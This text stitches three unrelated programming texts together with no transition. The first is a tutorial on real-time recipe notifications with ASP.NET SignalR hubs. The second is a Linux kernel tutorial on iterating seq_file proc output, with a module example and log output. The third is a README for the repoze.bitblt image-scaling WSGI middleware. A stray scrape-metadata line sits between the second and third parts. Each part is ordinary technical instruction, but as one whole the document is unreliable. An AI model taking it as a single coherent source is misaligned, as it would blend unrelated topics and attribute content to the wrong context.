Once a connection upgrade has been granted, WebSockets communicate in full-duplex using the WebSocket protocol over a TCP connection, literally creating a client-server connection within the browser that can be used for real-time messaging.
All major desktop browsers and almost all mobile browsers support WebSockets. However, WebSocket usage requires support from the web server, and a WebSocket connection may have trouble working successfully behind a proxy.
With all the tools and techniques available to enable real-time connections between our mobile web app and the web server, how does one make the choice? We could write our code to support long polling, but that would obviously use up resources on the server and require us to do some pretty extensive plumbing on our end. We could try and use WebSockets, but for browsers lacking support or for users behind proxies, we might be introducing more problems than we would solve. If only there was a framework to handle all of this for us, try the best option available and degrade to the almost guaranteed functionality of long polling when required.
Wait. There is. It's called SignalR.
SignalR
SignalR provides a framework that abstracts all the previously mentioned real-time connection options into one cohesive communication platform supporting both web development and traditional desktop development.
When establishing a connection between the client and server, SignalR will negotiate the best connection technique/technology possible based upon client and server capability. The actual transport used is hidden beneath a higher-level communication framework that exposes endpoints on the server and allows those endpoints to be invoked by the client. Clients, in turn, may register with the server and have messages pushed to them.
Each client is uniquely identified to the server via a connection ID. This connection ID can be used to send messages explicitly to a client or away from a client. In addition, SignalR supports the concept of groups, each group being a collection of connection IDs. These groups, just like individual connections, can be specifically included or excluded from a communication exchange.
All of these capabilities in SignalR are provided to us by two client/server communication mechanisms: persistent connections and hubs.
Persistent connections
Persistent connections are the low-level connections of SignalR. That's not to say they provide access to the actual communication technique being used by SignalR, but to illustrate their primary usage as raw communication between client and server.
Persistent connections behave much as sockets do in traditional network application development. They provide an abstraction above the lower-level communication mechanisms and protocols, but offer little more than that.
When creating an endpoint to handle persistent connection requests over HTTP, the class for handling the connection requests must reside within the Controllers folder (or any other folder containing controllers) and extend the PersistentConnection class.
public class MyPersistentConnection: PersistentConnection
{
}
The PersistentConnection class manages connections from the client to the server by way of events. To handle these connection events, any class that is derived from PersistentConnection may override the methods defined within the PersistentConnection class.
Client interactions with the server raise the following events:
- OnConnected: This is invoked by the framework when a new connection to the server is made.
- OnReconnected: This is invoked when a client connection that has been terminated has reestablished a connection to the server.
- OnRejoiningGroups: This is invoked when a client connection that has timed out is being reestablished so that the connection may be rejoined to the appropriate groups.
- OnReceived: This is invoked when data is received from the client.
- OnDisconnected: This is invoked when the connection between the client and server has been terminated.
Interaction with the client occurs through the Connection property of the PersistentConnection class. When an event is raised, the implementing class can determine if it wishes to broadcast a message using Connection.Broadcast, respond to a specific client using Connection.Send, or add the client that triggered the message to a group using Connection.Groups.
Hubs
Hubs provide us an abstraction over the PersistentConnection class by masking some of the overhead involved in managing raw connections between client and server.
Similar to a persistent connection, a hub is contained within the Controllers folder of your project but instead, extends the Hub base class.
public class MyHub : Hub
{
}
While a hub supports the ability to be notified of connection, reconnection, and disconnection events, unlike the event-driven persistent connection a hub handles the event dispatching for us. Any publicly available method on the Hub class is treated as an endpoint and is addressable by any client by name.
public class MyHub : Hub
{
public void SendMeAMessage(string message)
{ /* ... */ }
}
A hub can communicate with any of its clients using the Clients property of the Hub base class. This property supports methods, just like the Connection property of PersistentConnection, to communicate with specific clients, all clients, or groups of clients.
Rather than break down all the functionality available to us in the Hub class, we will instead learn from an example.
Real-time recipe updates
Within our BrewHow mobile app, it would be nice to receive notifications of new recipe additions when we are looking at the recipe list. To accomplish this, we will use the Hub mechanism provided by the SignalR framework to accomplish real-time notification of additions to the BrewHow recipe collection.
Installing and configuring SignalR
SignalR, like most modern .NET frameworks, is available as a NuGet package: Microsoft.AspNet.SignalR. We can install the package by entering the following into the Package Manager console:
Install-Package Microsoft.AspNet.SignalR
In addition to several assembly references to our project, the SignalR package also adds a new JavaScript file: jquery.signalR-1.1.2.min.js—your version may vary depending upon when you're actually reading this. This JavaScript file contains all the abstractions needed by the client web browser to communicate with both types of SignalR endpoints: persistent connections and hubs.
The SignalR JavaScript file is only one part of the client puzzle. To enable SignalR support in our app, we need to add references to the SignalR JavaScript library as well as to invoke the handler, /signalr/hubs, used to create a JavaScript proxy for any hubs within our project. These references will be placed in _Layout.cshtml.
@Scripts.Render("~/bundles/jquery")
<script
src = "~/Scripts/jquery.signalR-1.1.2.min.js"
type="text/javascript"></script>
<script
src = "~/signalr/hubs"
type="text/javascript"></script>
@RenderSection("scripts", required: false)
We must also register the /signalr/hubs route with the runtime. We can do this by simply invoking the MapHubs extension method for the route collection where we register the other routes for our app.
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
routes.MapHubs();
routes.MapRoute(
name: "BeerByStyle",
Note that the hub route is placed before all other MapRoute calls or other methods we may use to register routes. We do this because route selection is made on first match, and we don't want to inadvertently register something before SignalR within our route table.
Creating the recipe hub
We need to provide a hub to which clients can connect to receive notifications about new recipe additions.
Right-click on the Controllers folder of our project and select Add New Item….
In the Add New Item dialog box, search for SignalR and choose the SignalR Hub Class. Name the class RecipeHub.cs and click on Add.
We need to modify the RecipeHub class generated by Visual Studio. As stated earlier, clients are going to receive notifications about new recipes, but no client is ever going to post directly to this hub to communicate with the server. As such, we simply need to create an empty hub.
namespace BrewHow.Controllers
{
public class RecipeHub : Hub
{
}
}
An empty class may appear rather meaningless at first glance, but SignalR cannot create a proxy for clients to interact with the server without a class declaration.
Modifying the recipe list view
The recipe list view needs to be modified to connect to the recipe hub. The first order of business is to supply the recipe list with an ID. The ID will be used to locate and modify the list using jQuery. Assign the recipe list an ID of recipe-list.
<table id="recipe-list">
We can now add some JavaScript that will connect to the recipe hub and upon the notification of a new recipe, append new recipes at the bottom of our table with a background color of yellow.
$(function () {
$.connection.hub.start();
var recipeHub = $.connection.recipeHub;
recipeHub.client.recipeAdded = function (recipe) {
var tr = $("#recipe-list").find('tbody')
.append(
$('<tr>').css('background-color', '#ff0')
.append($('<td>')
.append($('<a>')
.attr('href', '/Recipe/Details/'
+ recipe.RecipeId
+ "/" + recipe.Slug)
.text(recipe.Name))
)
.append($('<td>')
.append($('<a>')
.attr('href', '/Recipe/'
+recipe.StyleSlug)
.text(recipe.Style))
)
.append($('<td>'
+ recipe
.OriginalGravity
.toFixed(3)
+ '</td>'))
.append($('<td>'
+ recipe
.FinalGravity
.toFixed(3)
+ '</td>'))
@if (Request.IsAuthenticated) {
@: .append($('<td>'
@: + 'Add to Library'
@: + '</td>'))
}
);
}
});
The JavaScript code is contained within a closure, ensuring it is only invoked once and cannot be invoked by any outside source. The very first line of code starts the hub connections on the client:
$.connection.hub.start();
The connection object is an object added to jQuery by the SignalR JavaScript. The hub property of the connection object provides a reference to the hub infrastructure of the SignalR client library. The call to the start method initializes the SignalR client and prepares the proxy code generated by the /signalr/hubs call in our _Layout.cshtml page to receive notifications from the server.
Next, the JavaScript establishes a connection to our recipe hub:
var recipeHub = $.connection.recipeHub;
On examining this code carefully, you will see that the connection to our RecipeHub class is identified in the connection class as recipeHub. The /signalr/hubs call that generates the proxy classes for the hubs within our app adds each hub it finds to the connection object using a camel-cased version of the hub class name: RecipeHub becomes recipeHub, MyHub becomes myHub, and so on.
The next line of code registers a method on the client to be invoked by the server when a new recipe is added.
recipeHub.client.recipeAdded = function (recipe) {
We could call this method anything we wanted—well anything except a name that matches a server-side method within the hub. It is the act of declaring a function on the client and assigning it to the client property of the hub that makes the method available to the server.
The rest of the code simply takes the RecipeDisplayViewModel object it receives and appends it to the table with a yellow highlight.
Publishing event notifications
We have talked about responding to clients from within a Hub or PersistentConnection based class. However, our RecipeHub class is empty and we have no other hub. Not to fret. We can notify other users of our app that this event occurred by placing code into the Create method of the RecipeController class after a recipe is saved to the repository.
var context = Microsoft.AspNet.SignalR.
GlobalHost
.ConnectionManager
.GetHubContext<RecipeHub>();
context
.Clients
.All
.recipeAdded(
_displayViewModelMapper
.EntityToViewModel(recipeEntity)
);
This code begins by retrieving the context of our RecipeHub class. We do this using the GetHubContext<RecipeHub>() method exposed by SignalR's ConnectionManager, as shown in the snippet above.
Sir Arthur C Clarke said:
"Any sufficiently advanced technology is indistinguishable from magic."
I will let you be the judge as to whether or not it's magic, but to invoke the recipeAdded method we defined and assigned to the client in JavaScript, we simply invoke it here passing the data we wish to return. The runtime handles the event dispatching for us and informs all clients of the RecipeHub class that we are invoking the recipeAdded method. If there is such a method on the client it will be invoked by the SignalR client code.
There is one more change required to make this work. Our repository currently doesn't set the RecipeId property of a recipeEntity class when it has been created. As we use the recipe's ID to provide links to the details from the list, we need to make sure it's available to all clients to which the broadcast is sent. This change is fairly simple. Just modify the repository to set RecipeId after changes to the Entity Framework context have been made.
recipeEntity.RecipeId = newRecipeModel.RecipeId;
Everything should work now. We just need two clients simultaneously connected to test it.
When we add a recipe in Google Chrome, it magically appears in the recipe list in Opera Mobile.
Summary
In this article we took a look at SignalR. The SignalR framework gives us unprecedented control of the communication between the browser and web server enabling real-time communication. This technology can be leveraged in games, real-time status updates, or to mimic push communications within a mobile web app.
About the Author :
Andy Meadows
Andy Meadows has been in a love affair with technology since his third-grade teacher introduced him to her TRS-80 Model III in 1981. After several months of typing "Go North" on the keyboard, he began his foray into BASIC programming. The TRS-80 Model III begat a Commodore 64 and an introduction to Pascal. By 1988, he was spending his summers earning money by writing software in C for local small businesses.
While attending college at the University of Georgia, Andy developed his passion for web development and, of course, beer. His first web application was a series of CGI scripts that output content for NCSA Mosaic and by 1994, he was designing web interfaces for global information systems.
After college, Andy wandered listlessly through the IT world spending time in several verticals using several different languages, but he always returned home to web development. In 2002, he began his foray into mobile development beginning with native Java development, and quickly moving into the mobile web space where he began marrying his two passions: mobile web development and .NET.
Since then, Andy has worked on several projects involving mobile development, web development, or both. He is extremely excited about the future of the mobile web made possible by the newest generation of mobile devices. He is currently working at a startup in Atlanta, where he lives with his wife and two children.
Finally, after two installments of the basics of debugging with sequence files, we're going to finish off by demonstrating the power of sequence files with an example that actually, well, sequences its output. And I'm going to admit up front that a bit of what follows is going to be speculation since much of the documentation on sequence files is either incomplete, inconsistent or, sadly, wrong. But we'll muddle through, you'll get to test everything, and the comments section will be open for folks to make suggestions and provide corrections and further enhancements. Additional coverage on sequence files can be found in Chapter 4 here.
(The archive of all previous "Kernel Newbie Corner" articles can be found here.)
This is ongoing content from the Linux Foundation training program. If you want more content, please consider signing up for one of these classes.
So What Are We About to Do?
Assuming you've come to grips with the previous two columns during which we showed how to use the sequence file implementation of proc files to do some basic module debugging, recall that the fundamental limitation of normal proc files is that they're limited to displaying only up to a single page of output, a page being of kernel size PAGE_SIZE. The simpler forms of sequence files you saw in the early columns, while they were terrifically convenient, still have exactly the same limitation, which is why we're going to cover this last variation, which allows you to beat that limit by defining an "iterator" for the output of your sequence file, and looping with that iterator to print as much output as your heart desires, one "item" at a time.
This is a common solution when you want to print, say, the contents of an entire kernel array of structures, or perhaps the entries in a linked list, where the full output would wildly exceed a single kernel page. If, however, you use a sequence file, you can define each output operation to print only a single data object, then just define your iterator to keep looping and printing, one at a time, until all your objects have been printed, the only size limitation being that the output when each of those items is printed can't exceed a single page in size per item.
There is one thing to keep in mind--all of this iteration and looping is completely invisible to the user, who will still simply invoke a single command to list the proc file and watch all that output come streaming by with no idea that all that iterating is happening underneath.
The seq_file Routines
For each seq_file you want to create that supports actual iteration, you need to define the following four routines (listed in the kernel header file include/linux/seq_file.h):
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
};
And what do each of these routines represent? Let's discuss them one at a time.
First, when you attempt to list the contents of the sequence file, the "start" routine that you define is automatically invoked to initialize the iteration loop. By default, the first time the start routine is called, the offset position passed to that routine is zero, which allows you to initialize pointers, allocate objects, or whatever it is you need to do to prepare to start printing. But that's not all.
If successful, the start routine is responsible for returning the address of the first "object" of many to be printed. This could be the first element in an array, the first object in a linked list, or whatever. But whatever it represents, that pointer must be set properly as it's the value that will be used for printing later.
Next, the purpose of your "show" routine should be self-evident--given a pointer to some object, the show routine is responsible for, well, "printing" it, using any of the sequence file output routines discussed in earlier columns. The only limitation here is that a single "show" operation can't print more than one page of output. And here's where the fun starts.
Your "next" routine is responsible for bumping up the iteration information of your sequence file in not just one but two ways. That routine must increment your position offset (typically by one), and it must also increment the void pointer to refer to the next data object to be printed. It might seem redundant to have two iterators keeping track of your progress, but you will need them both, for reasons that will be clear later.
In addition, your "next" routine is responsible for checking if you're finally out of objects to print, at which point it should return a NULL pointer to signify that there's nothing left to print.
Finally, the "stop" routine is invoked after all objects have been printed, and it's the responsibility of that routine to release any resources that were allocated initially by your "start" routine, and so on. All of this will become more obvious once we start working our way through the example. But there's one ugly detail we need to cover first.
What If I Want to Print LOTS of Data?
And here's a property of sequence files that seems to get little attention, so let's deal with it now. As I mentioned earlier, the major benefit of this "sequencing" of output is to beat the kernel page limit, so as long as any single output operation from your "show" routine is less than a page, you're fine. But that's not the whole story.
It turns out that, as you keep printing one object after another, your total output (one printed item after another) is still being checked against that page limit and, if you're about to exceed that limit, that's when things get exciting.
If your next "show" operation would cause the total amount of output printed thus far to exceed a page, the sequence file terminates printing, calls your "stop" routine, cleans up and then immediately restarts printing by re-invoking your "start" routine with the offset position of where things left off, which means that you need to design all of your routines with the understanding that this stopping and re-starting has to be absolutely seamless and invisible to the user. You'll see what I mean shortly once we get into the example.(Note: This feature--the potential stopping and restarting in the middle of printing--is why so many beginning programmers, when testing their first sequence file, complain that something must be going wrong as their "stop" routine seems to be called more than once. They don't realize that that is, in fact, normal behaviour, depending on the amount of output.)
So What's the Example Going to Do?
To demonstrate all of this, let's use a totally contrived example that does nothing but print even numbers, one number per "show" operation, as if this was a useful thing to do. In addition, let's throw in some dynamic memory allocation and allocate a single integer which will store the current value of the even number, even though that's a bit of overkill.
In addition, let's add a module parameter that lets us specify how far we want to print. And, on top of all that, let's throw in massive amounts of kernel debugging information to the /var/log/messages file so you can follow what happens as you enter and exit each routine.
The Example
Let's call our module source file evens.c, and away we go with header files and our module parameter:
#include <linux/moduleparam.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/fs.h>
#include <linux/seq_file.h>
#include <linux/slab.h> // for kmalloc()
static int limit = 10;
module_param(limit, int, S_IRUGO);
Next, let's declare a pointer to the integer we're going to dynamically allocate to store the current even number. As I said, this is a bit of a contrived example and you'd normally be "printing" more interesting objects, but this is enough to demonstrate the basic principles:
static int* even_ptr;
And now, one at a time, let's define our four essential routines.
The "start" Routine
static void *
ct_seq_start(struct seq_file *s, loff_t *pos)
{
printk(KERN_INFO "Entering start(), pos = %Ld.\n", *pos);
if ((*pos) >= limit) { // are we done?
printk(KERN_INFO "Apparently, we're done.\n");
return NULL;
}
// Allocate an integer to hold our increasing even value.
even_ptr = kmalloc(sizeof(int), GFP_KERNEL);
if (!even_ptr) // fatal kernel allocation error
return NULL;
printk(KERN_INFO "In start(), even_ptr = %pX.\n", even_ptr);
*even_ptr = (*pos) * 2;
return even_ptr;
}
So what can we say about the above? Plenty:
- This routine, and all of the others, will be printing all sorts of debugging information so you can keep up with what happens at each step.
- While we expect the first invocation of the start routine to begin with an offset position of zero, we need to allow for the fact that (as we mentioned above), this represents a restart somewhere in the middle of our sequence, so under no circumstances should you count on that value being zero, and you should always compare it to the terminating value to see if it's time to stop.
- If we just entered this routine, it's our responsibility to allocate whatever we might need (even if this is a restart). This suggests that, when we call the "stop" routine, it's our job to release all acquired resources, even it it means that we need to reacquire them all over again on a restart.
- Just for fun, print the address of the dynamically-allocated integer, because if we have to free and reacquire that space, it's easy to see that you might not get the same space the next time.
- Finally, based on whatever the value of that position offset is, you need to initialize your even number to the appropriate value. If this is a restart, it will be initialized to the value that represents where you need to pick up where you left off.
So far, so good? Moving on, then.
The "show" Routine
This routine is fairly straightforward--given the address of the "thing" you want to print, cast the pointer to the correct type, dereference it, then print it, based on whatever definition of "printing" you've decided on:
static int
ct_seq_show(struct seq_file *s, void *v)
{
printk(KERN_INFO "In show(), even = %d.\n", *((int*)v));
seq_printf(s, "The current value of the even number is %d\n",
*((int*)v));
return 0;
}
All of that looks fairly reasonable, except for the really verbose output message that represents the output of the sequence file. Normally, you'd simply print the value and move on. Instead, we were deliberately wordy simply because I want to print so much output that I do exceed that page limit of output at some point, so you can see what happens when that occurs.
The "next" Routine
This routine represents what has to be done to move on to the next object to print:
static void *
ct_seq_next(struct seq_file *s, void *v, loff_t *pos)
{
int* val_ptr;
printk(KERN_INFO "In next(), v = %pX, pos = %Ld.\n", v, *pos);
(*pos)++; // increase my position counter
if ((*pos) >= limit) // are we done?
return NULL;
val_ptr = (int *) v; // address of current even value
(*val_ptr) += 2; // increase it by two
return v;
}
Things to notice about the above:
- A major job of this routine is to detect when you have no data left to print, and return NULL when that happens.
- If you're not done, you have to bump up both the "offset" and the corresponding object pointer value, so that the next call to the "show" routine gets the correct value. Quite simply, it's your job to keep those two values in sync with one another.
The "stop" Routine
Finally, the job of your stop routine is to do any necessary cleanup and release of system resources that might have been allocated in your start routine, but make sure you keep the following in mind.
This might not be the end of all printing. Instead, as we explained above, your stop routine might have been invoked simply because you were about to exceed that page limit, at which point your sequence file is "stopped," then restarted with the current offset so that you can pick up where you left off.
In order to drive this home, we've added all sorts of debugging information so you can see clearly what your stop routine is doing:
static void
ct_seq_stop(struct seq_file *s, void *v)
{
printk(KERN_INFO "Entering stop().\n");
if (v) {
printk(KERN_INFO "v is %pX.\n", v);
} else {
printk(KERN_INFO "v is null.\n");
}
printk(KERN_INFO "In stop(), even_ptr = %pX.\n", even_ptr);
if (even_ptr) {
printk(KERN_INFO "Freeing and clearing even_ptr.\n");
kfree(even_ptr);
even_ptr = NULL;
} else {
printk(KERN_INFO "even_ptr is already null.\n");
}
}
The reason for all that output will become obvious shortly.
The Rest of the Module Source
Add this remaining code to your source file, and you're ready to go:
static struct seq_operations ct_seq_ops = {
.start = ct_seq_start,
.next = ct_seq_next,
.stop = ct_seq_stop,
.show = ct_seq_show
};
static int ct_open(struct inode *inode, struct file *file)
{
return seq_open(file, &ct_seq_ops);
};
static struct file_operations ct_file_ops = {
.owner = THIS_MODULE,
.open = ct_open,
.read = seq_read,
.llseek = seq_lseek,
.release = seq_release
};
static int
ct_init(void)
{
struct proc_dir_entry *entry;
entry = create_proc_entry("evens", 0, NULL);
if (entry)
entry->proc_fops = &ct_file_ops;
return 0;
}
static void
ct_exit(void)
{
remove_proc_entry("evens", NULL);
}
module_init(ct_init);
module_exit(ct_exit);
MODULE_LICENSE("GPL");
Your First Test Run
If you accept the default limit of just the first 10 even numbers, then build the module and load it, after which you should see a brand new file named /proc/evens. List that file to see the first 10 even numbers (starting with zero):
$ cat /proc/evens
The current value of the even number is 0
The current value of the even number is 2
The current value of the even number is 4
The current value of the even number is 6
The current value of the even number is 8
The current value of the even number is 10
The current value of the even number is 12
The current value of the even number is 14
The current value of the even number is 16
The current value of the even number is 18
That seemed to work fine, but it's the debugging output that went to /var/log/messages that's interesting and a bit puzzling:
Sep 6 15:11:34 localhost kernel: Entering start(), pos = 0.
Sep 6 15:11:34 localhost kernel: In start(), even_ptr = ffff88010b8bc6b8.
Sep 6 15:11:34 localhost kernel: In show(), even = 0.
Sep 6 15:11:34 localhost kernel: In next(), v = ffff88010b8bc6b8, pos = 0.
Sep 6 15:11:34 localhost kernel: In show(), even = 2.
Sep 6 15:11:34 localhost kernel: In next(), v = ffff88010b8bc6b8, pos = 1.
Sep 6 15:11:34 localhost kernel: In show(), even = 4.
... snip ...
Sep 6 15:11:34 localhost kernel: In next(), v = ffff88010b8bc6b8, pos = 8.
Sep 6 15:11:34 localhost kernel: In show(), even = 18.
Sep 6 15:11:34 localhost kernel: In next(), v = ffff88010b8bc6b8, pos = 9.
Sep 6 15:11:34 localhost kernel: Entering stop().
Sep 6 15:11:34 localhost kernel: v is null.
Sep 6 15:11:34 localhost kernel: In stop(), even_ptr = ffff88010b8bc6b8.
Sep 6 15:11:34 localhost kernel: Freeing and clearing even_ptr.
... hang on, why are we starting over here? ...
Sep 6 15:11:34 localhost kernel: Entering start(), pos = 10.
Sep 6 15:11:34 localhost kernel: Apparently, we're done.
Sep 6 15:11:34 localhost kernel: Entering stop().
Sep 6 15:11:34 localhost kernel: v is null.
Sep 6 15:11:34 localhost kernel: In stop(), even_ptr = (null).
Sep 6 15:11:34 localhost kernel: even_ptr is already null.
So what do we notice about the above, one step at a time:
- Unsurprisingly, the first invocation of your start routine is passed an initial offset of zero.
- The address of the dynamically-allocated integer to store my current even value is, on this 64-bit system, ffff88010b8bc6b8, which I'll need to deallocate later when I'm done.
- I can see the position offset and the even value increasing correspondingly, until the "next" routine finally notices that we've reached the end, at which point the "stop" routine is called.
- The stop routine checks that the variable even_ptr still has a non-zero value, at which point that storage is freed and the pointer is set to NULL for a reason that will become clear shortly.
And this is where things get a bit strange since, if you look closely at the above debugging output, even though we've printed all 10 of our desired even numbers and are officially finished, the implementation of sequence files still calls the "start" routine a second time with the position offset of 10, and it's the job of the start routine to notice that there's nothing left to do and immediately return NULL.
Not only that, but it should be obvious that because you're invoking the start routine a second time, you will be invoking your stop routine a second time as well, so you have to be careful that you don't try to free that same dynamically-allocated space again. It may be that this is the expected behaviour, but I have to admit I was a bit surprised to see this happening, so make sure you take this into account and be very careful with any kernel-space dynamic allocation.
Note: If you don't need to do any dynamic allocation, and that pointer represents simply the address of each existing data object in turn, then the above won't have any effect. But the above was simply to warn you about the subtle errors that might creep into your sequence files if you don't know about this.
And What If There's LOTS of Output?Finally, let's see what happens if you unload that module, then reload it with a much larger limit of, say, 1000:
# insmod evens.ko limit=1000This is what you might see in /var/log/messages as you list the contents of that proc file:
... things start off just as before ...
Sep 6 15:25:10 localhost kernel: Entering start(), pos = 0.
Sep 6 15:25:10 localhost kernel: In start(), even_ptr = ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: In show(), even = 0.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 0.
Sep 6 15:25:10 localhost kernel: In show(), even = 2.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 1.
Sep 6 15:25:10 localhost kernel: In show(), even = 4.
... much later, about to hit a kernel page limit,
so we stop printing and invoke the stop() routine ...
Sep 6 15:25:10 localhost kernel: In show(), even = 188.
Sep 6 15:25:10 localhost kernel: Entering stop().
Sep 6 15:25:10 localhost kernel: v is ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: In stop(), even_ptr = ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: Freeing and clearing even_ptr.
... only to invoke start() again, and pick up where we left off ...
Sep 6 15:25:10 localhost kernel: Entering start(), pos = 94.
Sep 6 15:25:10 localhost kernel: In start(), even_ptr = ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: In show(), even = 188.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 94.
... much more output snipped ...
Notice what happened there? Apparently, after printing a certain amount of output, your sequence file realized that it was about to exceed the kernel page limit in terms of total output, at which point it called things off, put a stop to printing and invoked your "stop" routine to shut everything down. After which, of course, it turned around, re-invoked your "start" routine with the position offset where it left off and picked things up again.
It just so happens that the next memory allocation call grabbed the same location that had just been freed, but there's no guarantee of that--it could have been a different address entirely.
And, as it did before, even when your sequence file hit the specified limit and was truly done printing all 1000 values, it insisted on restarting only to notice that, yes, this time it was really finished:
Sep 6 15:25:10 localhost kernel: In show(), even = 1996.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 998.
Sep 6 15:25:10 localhost kernel: In show(), even = 1998.
Sep 6 15:25:10 localhost kernel: In next(), v = ffff88010b8bc6d0, pos = 999.
... we're really and truly done now ...
Sep 6 15:25:10 localhost kernel: Entering stop().
Sep 6 15:25:10 localhost kernel: v is null.
Sep 6 15:25:10 localhost kernel: In stop(), even_ptr = ffff88010b8bc6d0.
Sep 6 15:25:10 localhost kernel: Freeing and clearing even_ptr.
... once again, restart only to notice nothing left to do ...
Sep 6 15:25:10 localhost kernel: Entering start(), pos = 1000.
Sep 6 15:25:10 localhost kernel: Apparently, we're done.
Sep 6 15:25:10 localhost kernel: Entering stop().
Sep 6 15:25:10 localhost kernel: v is null.
Sep 6 15:25:10 localhost kernel: In stop(), even_ptr = (null).
Sep 6 15:25:10 localhost kernel: even_ptr is already null.
Is It Always That Complicated?
Not necessarily. Note that I deliberately made this example more complicated than it had to be by dynamically allocating a single data pointer for no good reason, at which point I had to look after it constantly.
It may be that your sequence file is printing the entries in an array, and that the position offset very quickly gives you the address of the appropriate array element, so that there's no need for dynamic allocation anywhere. That's not uncommon, and it would obviously simplify your code. In cases like that, where the object pointer can be calculated directly from the position offset value, your start and stop code should be trivial.
Is There More?
Sure, why not. While we're here, let's beat this to death. First, notice that you're effectively responsible for keeping track of two "iterators"--the position offset (which starts off at zero and typically is incremented by one each time, identifying which object you're printing), and the "void *" object pointer, which is used to keep track of each object that you print.
While it might seem odd to need to handle two iterators, notice that you absolutely must keep them synchronized and up to date. The object pointer is necessary for the "show" routine to know which object to print, while the position offset value is critically important in case your sequence file needs to stop and restart in the midst of printing, since that's the only value that tells your start routine where to resume. Without that value, your sequence file simply won't work properly.
Another subtle but important point involves the "void *" pointer that is passed to your stop routine. If you examine both examples above, you'll notice that while that value seems to persist over stops and restarts, when your stop routine is called for the final time, that value appears to always be NULL. That means that you cannot use that pointer to store the result of a dynamic allocation since, by the time you get to your final call to your stop routine, you've lost that value. (One suspects that that "feature" is the reason a number of sequence files don't work properly at termination time.)
An additional point involves something you saw above--that even after your "next" routine detected that you were done and invoked your "stop" routine, you still ended up calling your "start" routine one more time, which immediately noticed that you were done, which then immediately invoked your "stop" routine yet again. This is a common source of sequence file errors, when someone deallocates some storage in their "stop" routine but doesn't clear the pointer, then tries to deallocate that very same storage a second time. That's why we insisted on setting the even_ptr pointer to NULL after the deallocation in your "stop" routine--to ensure that we didn't try to erroneously free it a second time.
And here's one final bit of information you might have some fun with. Note that most of your routines above accept, as a first argument, the pointer to the sequence file structure in question:
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
};
Not surprisingly, we ignore that struct seq_file* pointer for the most part, but if you're interested in seeing what's going on behind the scenes, you can examine the definition of that structure in the kernel header file include/linux/seq_file.h:
struct seq_file {
char *buf;
size_t size;
size_t from;
size_t count;
loff_t index;
loff_t read_pos;
u64 version;
struct mutex lock;
const struct seq_operations *op;
void *private;
};
Note how, if you're interested, you can examine various fields in that structure at any time, such as the size of the buffer and how full it is at any time. There's even a private pointer of type "void *" you're welcome to use if you want to store some data of that type -- perhaps a reasonable place to keep track of some dynamically-allocated data. If you're feeling ambitious, extend the example shown above by printing even more debugging information as each routine is called.
Some Real-Life Examples
If you want to examine some actual sequence files in the current kernel source tree, take a look at some of the source files under fs/proc. As one example, peruse the source in the file devices.c, which is the implementation of the /proc/devices file:
$ cat /proc/devices
Character devices:
1 mem [0, 256]
4 /dev/vc/0 [0, 1]
4 tty [1, 63]
4 ttyS [64, 32]
5 /dev/tty [0, 1]
... etc etc ...
What's interesting about that example is that, if you examine the "start" and "next" routines for that sequence file:
static void *devinfo_start(struct seq_file *f, loff_t *pos)you'll notice that the position offset value is being used simultaneously as the object address pointer value being returned. All this represents is an implementation that is so trivial and straightforward that that same value can do double-duty--not at all uncommon depending on what you're trying to do.
{
if (*pos < (BLKDEV_MAJOR_HASH_SIZE + CHRDEV_MAJOR_HASH_SIZE))
return pos;
return NULL;
}
static void *devinfo_next(struct seq_file *f, void *v, loff_t *pos)
{
(*pos)++;
if (*pos >= (BLKDEV_MAJOR_HASH_SIZE + CHRDEV_MAJOR_HASH_SIZE))
return NULL;
return pos;
}
So Is All of This Correct?
That's a good question. As I admitted up-front, I'm fairly sure I've got the semantics right, but I'm willing to be corrected, so test the above and leave observations in the comments section. And check back a few times since I might tweak this piece based on any feedback. | https://www.linux.com/learn/linux-career-center/44184-the-kernel-newbie-corner-kernel-debugging-with-proc-qsequenceq-files-part-3 | CC-MAIN-2014-23 | refinedweb | 4,613 | 58.11 |
I am trying to work on Audio file and have seconds as
int in C#, but I would like to convert seconds into hh:mm:ss ( hours, minutes and seconds) format, so How can I do it easily in C#?
For example: 20 Seconds = 00:00:20 in hour,minutes,seconds format.
If you are using .NET 4.0 or above, you can simply convert seconds into TimeSpan and then get hours:minutes:seconds
TimeSpan time = TimeSpan.FromSeconds(seconds); // backslash is used to ":" colon formatting you will not see it in output string str = time.ToString(@"hh\:mm\:ss");
Here is the sample Program
using System; public class Program { public static void Main() { TimeSpan time = TimeSpan.FromSeconds(890); // backslash is used to ":" colon formatting you will not see it in output string str = time .ToString(@"hh\:mm\:ss"); Console.WriteLine(str); } }
Output:
00:14:50
You can try it on .NET fiddle:
If you want to add "miliseconds" also, then use below format
string str = time.ToString(@"hh\:mm\:ss\:fff");
Subscribe to our weekly Newsletter & Keep getting latest article/questions in your inbox weekly | https://qawithexperts.com/questions/484/how-to-convert-seconds-into-hhmmss-in-c | CC-MAIN-2021-39 | refinedweb | 185 | 64.2 |
repoze.bitblt 0.9
Image transforming WSGI middleware
This package provides a WSGI middleware component which automatically scales images according to the width and height property in the <img> tag.
To configure the middleware, pass in a string for secret; this may be any string internal to the system.
You can also set filter to select the scaling filter. The available filters are nearest, bilinear, bicubic and antialias. The default is antialias.
If you want to change the compression level for JPEG images, then you can set the quality option to a value between 1 (worst) and 95 (best). The default is 80.
By default all image URLs are rewritten. With limit_to_application_url you can limit the rewriting to relative URLs and absolute URLs below the application URL.
